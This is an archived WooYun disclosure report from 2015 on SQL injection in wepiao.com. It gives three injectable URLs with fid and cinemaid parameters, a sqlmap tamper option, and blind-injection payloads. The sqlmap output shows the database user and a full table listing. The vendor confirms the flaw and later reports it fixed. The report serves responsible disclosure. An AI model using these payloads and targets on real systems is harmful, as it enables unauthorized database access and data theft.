乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-18: 细节已通知厂商并且等待厂商处理中 2015-06-18: 厂商已经确认,细节仅向厂商公开 2015-06-28: 细节向核心白帽子及相关领域专家公开 2015-07-08: 细节向普通白帽子公开 2015-07-18: 细节向实习白帽子公开 2015-08-02: 细节向公众公开
RT
三处注入打包注入点1:
http://www.wepiao.com/?a=filmdetail&c=film&m=web&fid=5452
fid参数注入点2:
http://www.wepiao.com/?a=cinemadetailshow&c=cinema&m=web&cinemaid=1002069
cinemaid参数注入点3:
http://www.wepiao.com/?a=seatinfo&c=film&mpid=5574e033ba8e7fbb7d8b56f5&scheid=&m=web&cinemaid=1002069&hid=8&fid=5577
cinemaid=1002069参数sqlmap证明下:需要加参数--tamper=space2comment
sqlmap identified the following injection points with a total of 169 HTTP(s) requests:---Parameter: fid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: a=filmdetail&c=film&m=web&fid=5452' AND 1072=1072 AND 'VGcO'='VGcO Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: a=filmdetail&c=film&m=web&fid=5452' AND SLEEP(5) AND 'BSKe'='BSKe Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---web application technology: PHP 5.4.35back-end DBMS: MySQL 5.0.12current user: 'app_weiying@%'current database: 'app_weiying'current user is DBA: Falseavailable databases [3]:[*] app_weiying[*] information_schema[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: fid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: a=filmdetail&c=film&m=web&fid=5452' AND 1072=1072 AND 'VGcO'='VGcO Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: a=filmdetail&c=film&m=web&fid=5452' AND SLEEP(5) AND 'BSKe'='BSKe Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---back-end DBMS: MySQL 5.0.12sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: fid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: a=filmdetail&c=film&m=web&fid=5452' AND 1072=1072 AND 'VGcO'='VGcO Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: a=filmdetail&c=film&m=web&fid=5452' AND SLEEP(5) AND 'BSKe'='BSKe Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])---web application technology: PHP 5.4.35, Nginxback-end DBMS: MySQL 5.0.12Database: app_weiying[50 tables]+-----------------------------+| !omment_like || comment || comment_reply || film_seen || film_want || t_weiying_banner || t_weiying_order || weiying_active || weiying_activites || weiying_ad || weiying_admin || weiying_admin_panel || weiying_admin_role || weiying_admin_role_priv || weiying_area || weiying_certificate || weiying_cinema || weiying_city || weiying_code || weiying_copywriting || weiying_device || weiying_evallike || weiying_evaluation || weiying_fctable || weiying_feedback || weiying_film || weiying_grouponticket_order || weiying_groupticket || weiying_hall || weiying_menu || weiying_notice || weiying_order || weiying_order_stream || weiying_paytemp || weiying_poster || weiying_praise || weiying_preuve || weiying_reply || weiying_sche || weiying_scheseat || weiying_scheseat_new || weiying_seats || weiying_see || weiying_show || weiying_tagephoto || weiying_ticket || weiying_token || weiying_user || weiying_versions || weiying_webad |+-----------------------------+
证明即可,就不继续深入了
参数过滤,尽快修复吧
危害等级:中
漏洞Rank:7
确认时间:2015-06-18 12:22
我们尽快修复,谢谢。
2015-07-19:已修复,非常感谢。
